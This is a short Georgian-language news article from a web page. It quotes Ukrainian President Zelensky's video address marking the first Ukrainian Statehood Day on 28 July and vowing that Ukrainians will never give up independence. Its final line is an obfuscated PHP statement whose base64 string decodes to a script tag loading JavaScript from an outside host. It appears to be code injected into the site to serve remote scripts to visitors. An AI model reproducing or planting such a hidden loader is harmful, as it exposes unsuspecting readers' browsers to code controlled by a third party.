celsiusi
ავერსი საქკაბელი
ხვალ მნიშვნელოვანი, სიმბოლური კვირა იწყება. კვირა, როდესაც 28 ივლისს პირველად აღვნიშნავთ უკრაინის სახელმწიფოებრიობის დღეს - ასე მიმართა უკრაინის პრეზიდენტმა, ვოლოდიმირ ზელენსკიმ მოქალაქეებს საღამოს ვიდეომიმართვაში. 
 
ზელენსკიმ ხაზგასმით აღნიშნა, რომ უკრაინელები არასდროს დათმობენ დამოუკიდებლობას და ისინი არ გატყდებიან. 
 
"ხვალ მნიშვნელოვანი, სიმბოლური კვირა იწყება. კვირა, როდესაც 28 ივლისს პირველად აღვნიშნავთ უკრაინის სახელმწიფოებრიობის დღეს ასეთი სასტიკი ომის დროს - მეექვსე თვეში. დონბასში რვაწლიანი ომის შემდეგ. მაგრამ ჩვენ აღვნიშნავთ. მიუხედავად ყველაფრისა. იმიტომ რომ უკრაინელებს ვერ გატეხენ. ყოველივე ამის შემდეგ, რაც ჩვენმა ხალხმა გამოიარა, იმის შემდეგ, რაც ჩვენ საუკუნეების განმავლობაში ვისწავლეთ, უკრაინელები არასოდეს დათმობენ დამოუკიდებლობას.
 
ამიტომ, ჩვენ არ ვანელებთ ტემპს და როგორც ყოველ დღე ხუთი თვის განმავლობაში, ყველაფერს ვაკეთებთ იმისთვის, რომ მტერს მაქსიმალური დანაკარგი მივაყენოთ და რაც შეიძლება მეტი მხარდაჭერა შევძლოთ უკრაინისთვის.
 
ამ კვირაში იქნება პარტნიორების მნიშვნელოვანი ვიზიტები, იქნება მნიშვნელოვანი მოლაპარაკებები და რაც მთავარია, იქნება უკრაინის პოზიციების შემდგომი წინსვლა. ფრონტზე, დიპლომატიაში, ეკონომიკაში.
 
მადლობელი ვარ ყველას, ვინც იცავს ჩვენს ქვეყანას! და ყველას, უკრაინელებს, ნაყოფიერ ახალ კვირას ვუსურვებ"- თქვა ზელენსკიმ. 
556
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");